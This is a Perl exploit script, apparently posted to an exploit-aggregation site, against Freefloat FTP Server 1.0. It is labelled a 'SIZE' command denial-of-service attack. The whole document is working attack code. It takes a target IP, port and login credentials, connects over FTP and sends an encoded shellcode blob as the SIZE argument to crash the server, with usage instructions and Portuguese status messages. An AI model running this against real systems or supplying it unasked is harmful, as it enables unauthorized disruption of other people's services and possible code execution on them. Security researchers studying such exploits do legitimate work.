Share
## https://sploitus.com/exploit?id=PACKETSTORM:163038
#!/usr/bin/perl -w  
#  
# e-mail: fernando.mengalli@gmail.com  
#  
# Date: 06/09/2021 - 09 jun  
#  
# Version Vulnerable: Freefloat FTP Server 1.0  
#  
# vídeo: https://youtu.be/de3lCDHLWFE  
#  
# OS Tested: Windows XP PACK 3 Brazilian  
#  
  
  
use Net::FTP;  
use Term::ANSIColor;  
  
  
$sis="$^O";  
print $sis;  
  
if ($sis eq "windows"){   
$cmd="cls";  
} else {   
$cmd="clear";   
}  
  
system("$cmd");  
  
if ((!$ARGV[0]) || (!$ARGV[1])) {  
  
&apresentacao();  
  
}  
  
sub apresentacao {  
  
print q {  
#############################################################################  
# #  
# [*] Freefloat FTP Server 1.0 - 'SIZE' - Denied of Service #  
# #  
# Author: Fernando Mengali #  
# #  
# [+] Modo de uso: perl exploit.pl <IP> <Porta> #  
# #  
############################ Code Exploit ###################################  
}  
}  
  
  
our $alvo = $ARGV[0];  
our $porta = $ARGV[1];  
  
if (!$ARGV[0] && !$ARGV[1]) {  
exit;  
}  
  
  
if($alvo !~ /(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) {  
print color('red bold');  
print " \n\n [-] Por favor, defina o IP alvo! \n\n";  
color('reset');  
exit;  
}  
  
if($porta < 0 || $porta > 65535) {  
print color('red bold');  
print " \n\n [-] Por favor, defina uma porta de 1 a 65535! \n\n";  
color('reset');  
exit;  
}  
  
print color('green bold');  
print "\n\nAlvo definido =>" .$alvo . " \n \n";  
print "Porta definida =>" .$porta . "\n\n";  
color('reset');  
  
print color('yellow bold');  
print "[+] Por favor, informe a nome de usuário: ";  
color('reset');  
print color('red bold');  
my $usuario = <stdin>;  
chomp($usuario);  
color('reset');  
  
print color('yellow bold');  
print "[*] Por favor, informe a senha de acesso: ";  
color('reset');  
print color('red bold');  
my $senha = <stdin>;  
chomp($senha);  
color('reset');  
  
my $shellcode =   
"\xba\x17\x61\x66\xaf\xdb\xd9\xd9\x74\x24\xf4\x5d\x2b\xc9" .  
"\xb1\x60\x31\x55\x12\x83\xed\xfc\x03\x42\x6f\x84\x5a\xb7" .  
"\xa9\xf0\x15\x7b\xd9\xfb\x8f\xf7\x01\x08\x75\xdc\x80\x41" .  
"\xd3\x13\x51\xba\xe7\x11\x4d\x39\x25\x21\xb3\x27\x8b\x30" .  
"\xef\xf1\xac\xbd\x95\xe9\xcf\x1a\x1d\xb9\xe1\xf6\x27\x0b" .  
"\xff\x02\x98\xc0\xf6\xc7\x19\x52\xc4\x94\x18\xdb\x56\x20" .  
"\xb6\x9a\xc4\xb5\xec\xf3\x40\xd4\x19\x17\x6d\x35\x50\x3a" .  
"\x13\xc3\xb3\xf0\x38\x8d\xff\xc5\x05\x55\x33\xe7\xd2\x9e" .  
"\xb6\x8c\x9b\x79\xce\x8f\xd6\x30\x72\x12\x62\x26\x3e\xed" .  
"\xef\xda\x23\x88\x07\x74\xdc\xbe\xe1\xc4\x3e\x91\x8a\x26" .  
"\x3a\x3f\x2b\xf2\xe5\x3a\x18\x0f\xd0\x8d\x7b\xba\xf3\xba" .  
"\x2b\x5b\xa5\x2d\x54\xaa\x88\x68\x4b\xf4\xcc\x24\x68\xc1" .  
"\x19\x22\xf9\x08\xd6\x08\x8f\x4a\xe0\x7d\x67\xc1\x4e\xd8" .  
"\x08\x34\x44\x2b\x6a\x6f\x41\x6d\x53\x26\x73\x9d\xb4\xca" .  
"\x87\xed\xe6\x2d\x8b\x1c\x42\x0e\xb3\x20\xd0\xa1\x48\x97" .  
"\x45\x46\x26\x6b\xe7\x74\x52\xc1\xae\x2d\x8d\x1a\x06\xe0" .  
"\x24\x26\xbe\xfe\x26\xf8\x48\x75\x73\x5d\x6c\x67\xeb\xf4" .  
"\xf4\x08\x91\xf8\x5f\x4a\x3a\xd4\x5c\xd4\x7c\x52\x13\xa5" .  
"\x08\x06\xc9\x8b\x04\x9a\x0f\xe5\xe8\x1f\xef\x28\x3b\xe9" .  
"\x6e\xf9\xee\x7e\xf0\x5c\x5e\x4f\x95\x49\x0f\x83\xf0\x70" .  
"\x09\xf6\x83\xe9\x43\xb8\xe0\x88\x51\x6e\x9c\x5d\x48\x5b" .  
"\x9b\xca\x9a\xf1\x48\xa8\x51\x22\x61\x12\x55\xfe\x10\x16" .  
"\xb5\x42\x42\xff\x15\x14\x3f\x44\x9b\x92\xfc\xd9\x67\xe0" .  
"\x15\xd1\x64\xce\x75\xec\xa3\x08\x03\x61\x4a\x3b\x0e\x5a" .  
"\xb0\x7b\xe6\x2c\xac\xae\x5d\xad\x71\xf5\xb8\xc4\x4f\xd3" .  
"\xf4\x40\x2b\x92\x75\x83\xe3\x0f\x4c\x23\x78\x72\x0f\x22" .  
"\xb9\x10\xa6\x1d\xc9\xcb\xca\xe5\x61\xf8\x5f\x64\x86\x49" .  
"\x5b\xb2\x9e\x75\x30\xc6\x6e\x3c\x9a\x02\xad\x03\x36\x29" .  
"\xaf\x84\x62\x98\x22\xcd\xbf\x7e\xa2\x14\x97\x75\xa2\xc3" .  
"\xab";  
  
  
$payload = $shellcode . "\r\n";  
  
print color('cyan');  
print "\n\n[+] Conectando para o servidor " . $alvo . ":" . $porta."... \n";  
$ftp = Net::FTP->new($alvo, Debug => 0, Port => $porta) || die color('red')."\n[-] Não foi possível conectar. \n";  
sleep(2);  
print "[+] Conectado!\n";  
sleep(2);  
$ftp->login($usuario,$senha) || die color('red')."\n [-] Não pode conectar ou você derrubou: $!";  
print "[+] Autenticando...\n";  
sleep(2);  
print "[+] Autenticado com sucesso!\n\n";  
sleep(2);  
print "[*] Sobrecarregando o servidor...\n\n";  
sleep(2);  
$ftp->command("SIZE ", $payload);  
color('reset');  
print color('green bold');  
print "[+] Servidor fora do ar!\n";  
color('reset');  
exit(0);